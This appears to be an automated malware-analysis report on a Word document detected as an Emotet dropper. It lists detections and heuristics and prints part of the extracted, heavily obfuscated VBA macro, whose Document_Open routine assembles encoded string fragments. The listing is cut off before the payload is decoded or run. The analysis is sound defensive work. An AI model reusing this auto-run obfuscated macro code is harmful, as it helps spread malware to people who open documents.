MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample was detected by ClamAV as 'Doc.Dropper.Emotet-6769465-0', indicating a known Emotet dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the macro is designed to execute automatically when the document is opened, likely to download and execute a secondary payload. The VBA code itself is heavily obfuscated, but the overall structure and the ClamAV signature point to a malicious dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Emotet-6769465-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-6769465-0
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 84,750 bytes but its declared streams total only 36,254 bytes — 48,496 bytes (57%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8618 bytes |
SHA-256: bd1a64e56f3e9fea93a67041977bf1044bbe7c4d4567519cf6a02853083edd58 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jVYtUPcqB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If iNHpEw >= dsZGTv Then
End If
If SpOYK Eqv 15 Then
End If
If ZMchXh And 12 Then
End If
If IzEXM Xor 16 Then
End If
If mEciUV < 15 Then
End If
If MzzOW = XFAJr Then
End If
mmjATOqHNPqPj (ttjtpuWFM + tljhitiiGLo + nrcnHF + njEqOSbS + FDMRWCinY + OkhQzwYF + XqjwQ + GDYrDJMSc + djiiR + YKFtH + IjOCi + EkWMOB)
If AjGnC <= SlUWj Then
End If
If YKIwA <> DQjLs Then
End If
End Sub
Attribute VB_Name = "AQniZNf"
Function ttjtpuWFM()
dBVArF = "`ja ,S,@ [p[" + "b[q [0[E[T:[J[v[n[" + " [ZS[*[ [P[l," + "[ [bC[l[ [)" + "[g[c[ [U[V[G[ "
If koCVu <> YhwvuO Then
End If
If FXPhRn <= iCCRG Then
End If
If XXpVu = WXkji Then
End If
If GJrBn And PdDpXW Then
End If
BnHINsMinXf = "[1[J,[ [gQ[;[ ,T" + "[>[ [2[0[A[ " + "[_[J[z[ [F[nq[ [+" + "D[I[ [r[b[ [ ]F [" + " [pn+[ [g&[W[" + " [>[w[M[zs[yK"
If bvHzSR <> 16 Then
End If
nLIsfDrfBKz = "[z[A[J[6[x[_[i[t" + "[e[XO[0`F[4[5[q[" + "qr[j[^[yd[n`&[!o[" + "z[g[/[G88[t2[h[^[#"
dqSciv = "[3[^K[J[\[bu[2[" + "Io[9[L/[_[;[h" + "[q8[{['%[T$[H["
ttjtpuWFM = dBVArF + BnHINsMinXf + nLIsfDrfBKz + dqSciv
If NYzFmA > olzbm Then
End If
End Function
Function tljhitiiGLo()
jMSzGVmwIN = "N[^[{[L[zm&[" + "d[*[![8[X[M[ [([" + "z[E[j[0o[L"
If FcbTaK Xor XuDaGJ Then
End If
wFDsV = "[b`[4[b[q[>[ [q[F" + "[h[T[r[*[2[w&[b[" + "X[b[f[h[_[P[;l[4" + "otsx[ [gk[=%[2[F[.[" + "U%[8M[/@&[3[*" + "[l[T[ " + """" + "[l[^["
cKAKJAuw = "v[X[6[m[W[{[8[![Q[>" + ",[ F[7[$[)[A" + "[Z[1[N[t[x[y[f[.[4[G"
tljhitiiGLo = jMSzGVmwIN + wFDsV + cKAKJAuw
If rDlil Or 13 Then
End If
If FosoP <= 10 Then
End If
End Function
Function nrcnHF()
GpXUmshi = "[I[+['[z[!<O[w%[1[^[" + "5[bn[u[^[iO[T[-" + "[f[a[N[i[C" + "[E[<[ [a[#K" + "[m[^e[n[B[l[-[v"
If ufIsVw = EKNSk Then
End If
If XChsqp >= uoSAEC Then
End If
qHoQGBSmzVr = "B[i%[ [Ik7[N[M[" + "t,[-[n[l[Z%&[A[([/[" + "c[+[-[([a[h[ [9"
AYMoAtMj = "&[Q[6[/&[p" + "[q[\[F[![P[1[w[x[" + "?['[b[v[z[U[Vo[y@" + "[B[qx[h[X[x[I[2[b&G" + "[y[Y[_[e[H[P" + "[>s[C[9[l["
nrcnHF = GpXUmshi + qHoQGBSmzVr + AYMoAtMj
If mHjKq = 10 Then
End If
If JHBPCE > PmSZuD Then
End If
End Function
Function njEqOSbS()
If nIoRP <= 18 Then
End If
If vDIjva = 11 Then
End If
If XqMzW Eqv XEQFNI Then
End If
knXADqtsBPr = ">[0[f[![e%[M" + " [R[E[8k[3%[C[f[5" + "[^[P[ 8[B[v[N" + "[ [p[:[f[3[=[>" + "[I[h[b[g[!.[([ %[]k" + "S[eo[X[m`[T[#A[^[C["
TUtAPjKdBj = ")K[b[6[.[to[![Z[(" + "[l[#^4[c[]S[" + "![8[B[p[{$[W[i[F[b[" + "I[8[n[u[p[F[#[b"
If opNVj And XVYnH Then
End If
If mDOaFN <> 17 Then
End If
If wYhjd Or qGGkO Then
End If
If GpbJZ Xor RhLfG Then
End If
UVCwI = "[5[=[x[+[E" + "[u[p[$[9[Co[([c[" + "<N[t[c[{[)["
kpnwCSo = "h[D[Q[F[w[.[b[X[![" + "eS[7[([N[w[v[" + "$k[q[=[Y['" + "*[z[$,[B[L[([" + "([w[D`s[{[Q[f"
If ZkamBm And sffBOz Then
End If
If mLJGF Or NHAloX Then
End If
If SVaqp <= 16 Then
End If
If AOXSbj <= 3 Then
End If
ivbzHYtafmG = "[ [;[A[i[0[j[v[" + "_[5[Fk[rKSk[m[2[J" + "[q[7[M[T[ s[ [" + "?[)k[;[a[Cb[P[M[w[" + "!![7[ [:[)[d`T["
smZWwSjrSXi = ":O[?[^[X[L[.m[e" + "[+[8[![(][r[" + "8[$[][i$[IO[" + "X[3s[d[(6[N[d[h[" + "1&[?[j[$[p[/[ [ [T" + """"
njEqOSbS = knXADqtsBPr + TUtAPjKdBj + UVCwI + kpnwCSo + ivbzHYtafmG + smZWwSjrSXi
If hjbvM > ZBNOBz Then
End If
If ivVBv Or oliawj Then
End If
If Xcfpj > FwpjR Then
End If
End Function
Function FDMRWCinY()
If ipBja Xor 1 Then
End If
If zqTJlh <= rjUbbW Then
End If
iDhCqI = "[+:[z[F[E[ {[N" + "[I[tP6[vh[I[][+w" + "[q[l,[![.,[q[8[1[n[" + "u&[x[a[4[$[" + "z[7[<[=[V[*[e["
EPsRdEJmcE = "$[b[W[T%[ [Lo[q" + "[B[_[4[f[X@[-[" + "i[0[+k[m[Q[" + "7[A[P[Q[Y[W[+k[u[5[$
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.